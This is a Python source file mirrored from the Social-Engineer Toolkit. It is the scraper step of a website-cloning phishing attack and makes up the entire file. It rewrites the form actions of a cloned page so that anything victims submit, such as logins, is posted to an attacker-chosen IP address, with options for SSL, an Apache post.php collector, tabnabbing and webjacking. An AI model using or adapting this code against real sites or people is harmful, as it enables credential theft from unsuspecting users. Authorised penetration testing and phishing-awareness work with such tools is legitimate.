mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-12-24 03:33:09 +00:00
96 lines
3 KiB
Python
96 lines
3 KiB
Python
#!/usr/bin/env python
|
|
|
|
import os
|
|
import sys
|
|
import re
|
|
import subprocess
|
|
import urlparse
|
|
import shutil
|
|
from src.core.setcore import *
|
|
|
|
|
|
#
|
|
# Scraper will grab the cloned website and try defining post parameters
|
|
#
|
|
|
|
# grab ipaddr
|
|
if check_options("IPADDR=") != 0:
|
|
ipaddr = check_options("IPADDR=")
|
|
else:
|
|
ipaddr = raw_input(setcore.setprompt("0", "IP address to connect back on: "))
|
|
update_options("IPADDR=" + ipaddr)
|
|
|
|
# set the multiattack tabnabbing/webjacking flag
|
|
multi_tabnabbing="off"
|
|
multi_webjacking="off"
|
|
if os.path.isfile(setdir + "/multi_tabnabbing"):
|
|
multi_tabnabbing="on"
|
|
if os.path.isfile(setdir + "/multi_webjacking"):
|
|
multi_webjacking="on"
|
|
|
|
# see if we're tabnabbing
|
|
fileopen=file(setdir + "/attack_vector", "r")
|
|
for line in fileopen:
|
|
line=line.rstrip()
|
|
if line == 'tabnabbing' or multi_tabnabbing == "on" or line == 'webjacking' or multi_webjacking == "on":
|
|
site='index2.html'
|
|
else:
|
|
site='index.html'
|
|
|
|
# set ssl flag to false by default
|
|
ssl_flag="false"
|
|
# SEE IF WE WANT TO USE SSL
|
|
ssl_check = check_config("WEBATTACK_SSL=").lower()
|
|
if ssl_check == "on": ssl_flag = "true"
|
|
|
|
# check apache mode
|
|
apache_mode = check_config("APACHE_SERVER=").lower()
|
|
# if we are turned on this will change to /post.php
|
|
|
|
track_user = check_config("TRACK_EMAIL_ADDRESSES=").lower()
|
|
if track_user == "on":
|
|
apache_mode = "on"
|
|
|
|
apache_rewrite = ""
|
|
# if we are turned on, change this
|
|
if apache_mode == "on": apache_rewrite = "post.php"
|
|
|
|
# start the scraping process
|
|
fileopen=file(setdir + "/web_clone/%s" % (site),"r").readlines()
|
|
filewrite=file(setdir + "/web_clone/index.html.new","w")
|
|
for line in fileopen:
|
|
|
|
# specify if it found post params
|
|
counter=0
|
|
# if we hit on a post method
|
|
|
|
match=re.search('post',line, flags=re.IGNORECASE)
|
|
method_post=re.search("method=post", line, flags=re.IGNORECASE)
|
|
if match or method_post:
|
|
|
|
# regex for now, can probably use htmlparser later, but right not what its doing is
|
|
# replacing any url on the "action" field with your victim IP which will have a custom
|
|
# web server running to post the data to your site
|
|
if ssl_flag == 'false':
|
|
line=re.sub('action="http?\w://[\w.\?=/&]*/', 'action="http://%s/' % (ipaddr), line)
|
|
if apache_mode == "on":
|
|
line = re.sub('action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
|
|
if ssl_flag == 'true':
|
|
line=re.sub('action="http?\w://[\w.\?=/&]*/', 'action="https://%s/' % (ipaddr), line)
|
|
if apache_mode == "on":
|
|
line = re.sub('action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
|
|
|
|
|
|
|
|
filewrite.write(line)
|
|
|
|
|
|
# close the file
|
|
filewrite.close()
|
|
# move our newly created website with our post stuff to our cloned area
|
|
if os.path.isfile(setdir + "/web_clone/index.html.new"):
|
|
shutil.copyfile(setdir + "/web_clone/index.html.new", setdir + site)
|
|
if os.path.isfile(setdir + "/web_clone/" + site):
|
|
os.remove(setdir + "/web_clone/" + site)
|
|
shutil.move(setdir + "/web_clone/index.html.new", setdir + "/web_clone/%s" % (site))
|
|
|